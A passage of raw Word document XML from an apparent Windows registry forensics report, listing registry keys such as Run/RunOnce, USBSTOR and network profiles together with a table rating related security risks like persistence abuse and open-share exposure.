          <w:p w14:paraId="01972900" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Recent documents accessed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00BC297B" w14:paraId="2F72FA01" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41B26CF3" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and RunOnce</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="750A83E6" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>Autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t xml:space="preserve"> programs for persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00BC297B" w14:paraId="33D42101" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68EDBE1F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and RunOnce</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03A3893A" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t xml:space="preserve">System-wide </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t xml:space="preserve"> programs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00BC297B" w14:paraId="702FB44B" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C030046" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>HKCU\SOFTWARE\Microsoft\Windows\Shell\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>BagMRU</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t xml:space="preserve"> and Bags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A2E6043" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>Shellbags</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>, file explorer navigation artifacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00BC297B" w14:paraId="771D5553" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="712485CC" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>HKLM\SYSTEM\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>CurrentControlSet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>\Enum\USBSTOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="212DDA53" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t xml:space="preserve">USB storage devices enumeration </w:t>
            </w:r>
            <w:r w:rsidRPr="00BC297B">
              <w:lastRenderedPageBreak/>
              <w:t>and serial numbers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00BC297B" w14:paraId="272D2EAD" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B5F53AE" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:lastRenderedPageBreak/>
              <w:t>HKLM\SYSTEM\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>MountedDevices</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5319FDDF" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Maps volume GUIDs and drive letters to USB devices</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00BC297B" w14:paraId="0CD6E318" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B647473" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>HKLM\SYSTEM\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>CurrentControlSet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>\Services\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>LanmanServer</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>\Shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27D40BD6" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Lists active SMB shares</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00BC297B" w14:paraId="08A3E43D" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AD2B4BC" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="706C5FCB" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Network interface IP configurations</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00BC297B" w14:paraId="12B6F15B" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1277A472" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>NetworkList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>\Profiles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12EC6A4E" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Network Location Awareness (NLA) profiles &amp; last connection times</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00BC297B" w14:paraId="3DA277E4" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F55DA52" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>HKLM\SYSTEM\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>CurrentControlSet</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>\Control\</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>FileSystem</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BA54059" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Check if NTFS last access timestamps are enabled/disabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CDE2C7D" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:pict w14:anchorId="705F8840">
          <v:rect id="_x0000_i1065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="125D75E7" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vulnerabilities &amp; Security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3344"/>
        <w:gridCol w:w="971"/>
        <w:gridCol w:w="2684"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00BC297B" w14:paraId="54590867" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2680E521" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC297B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Risk Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39E2DE08" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC297B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F6CB7D7" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC297B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18D59244" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BC297B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impact on Workload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00BC297B" w14:paraId="3DF420E3" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76A43F1E" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Persistence Abuse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16164ABA" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Malicious entries in Run/RunOnce keys for stealthy malware persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="703D798A" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="016C9747" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Compromise of system integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00BC297B" w14:paraId="192E779E" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="599E70BE" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>USB Device Forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E580AE2" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Sensitive info leak through USB device history and serial tracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02A63C20" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E5D37B2" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Data leakage or tracing attacker presence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00BC297B" w14:paraId="395A5C36" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26AFAB9C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Network Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C5756E4" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Extraction of firewall profiles and network interface details</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DAD2CC9" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="779C118E" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Enables lateral movement and reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00BC297B" w14:paraId="52C869F0" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A90658C" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>File System Artifacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70949535" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t xml:space="preserve">Abusing </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>shellbags</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t>UserAssist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00BC297B">
              <w:t xml:space="preserve"> for stealthy persistence or evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F2CFAEF" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BA34CDC" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Difficult detection, forensic evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A71933" w:rsidRPr="00BC297B" w14:paraId="3F3C463C" w14:textId="77777777" w:rsidTr="00C7355F">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D950A1B" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Open Shares Exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09B1998F" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Enumeration of open shares could reveal attack vectors or data exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D5CBE37" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="69FA37D1" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00C7355F">
            <w:r w:rsidRPr="00BC297B">
              <w:t>Potential lateral movement and data exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="065F4890" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00000000" w:rsidP="00A71933">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="1BFAEBF9">
          <v:rect id="_x0000_i1066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="106F6AD9" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D62B298" w14:textId="77777777" w:rsidR="00A71933" w:rsidRPr="00BC297B" w:rsidRDefault="00A71933" w:rsidP="00A71933">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC297B">
        <w:rPr>
          <w:b/>
